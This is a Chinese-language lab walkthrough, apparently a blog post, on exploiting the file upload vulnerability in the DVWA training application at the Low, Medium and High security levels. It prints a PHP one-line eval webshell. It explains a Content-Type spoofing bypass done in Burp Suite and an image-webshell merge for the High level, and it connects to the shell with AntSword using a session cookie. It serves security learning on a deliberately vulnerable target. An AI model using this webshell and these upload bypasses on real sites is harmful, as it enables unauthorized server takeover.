DVWA文件上传漏洞实现详细操作
Low等级下的上传漏洞没有检测,可以直接上传.php文件
php文件里面写的是一句话木马<?php @eval($_POST[root]);?>
将你的上传路径粘贴到地址栏并回车
将url复制并在蚁剑中链接,获取web权限,Low级通过
把我们在Low级上传的php文件删除,开始medium
medium下后端检查的是文件类型,如果文件类型为image/jpeg即可通过
首先设置浏览器代理模式,我这里用的是火狐
先将我们的一句话木马文件准备好但不上传
将我们得Burp Suite代理开启(intercept is on 代表开启,on变成off代表关闭)
Burp Suite Pro我是在这下的
博主写的很详细,大家跟着下就可以
开启burp suite代理后我们点击上传(这里我遇到了小插曲,我刚开始是用127.0.0.1/dvwa进行的漏洞渗透,但是点击上传的时候burp suite抓不到包,看大佬们说用本机的ip可以,所以我就改成了本机ip168.192.***.***/dvwa,确实能够抓到包了)
抓到的包
红线处的类型我们改为image/jpeg
点击forward即可上传成功
继续之前的操作,将上传的php文件的url复制到中国蚁剑(代理没关的一直按forward就可以进入新的网页了)
接下来是high级别
查看源码可以知道这次的条件是文件名以jpg或jpeg结尾
之前的抓包修改类型在这里是不可用的,也不可以上传php文件,在burp suite中直接将文件名后缀添加上jpg,这里需用到一句话图片木马
准备一张后缀名为jpg的正常图片,还有我们之前的php一句话木马文件
通过Windows的dos窗口将两文件合并(我是将图片放桌面了,就按照在桌面的方式合并了)
现在直接上传就行
因为中国蚁剑是无法解析jpg文件的,所以这次我们要找到图片的存储路径来给到中国蚁剑
把我们上传成功后的网址改为第二张图片的网址
此时测试链接是无法连接的,是因为中国蚁剑不会携带cookie,我们先添加
添加后我们右击浏览网站来添加cookie
把左上角url那里改为dvwa首页回车
进来后dvwa安全级别默认是impossible,我们改为high
改完以后就有了high级别cookie,一定要点一下保存,我第一遍没点仍旧连不上
回到首页就可以链接上了,到dvwa/www/hackable/uploads下就能看到attack.jpg文件了
